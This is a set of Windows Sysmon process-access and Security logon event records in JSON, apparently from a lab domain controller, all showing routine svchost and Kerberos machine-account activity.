{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220434,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x661A5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52638\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x661a5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52638","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
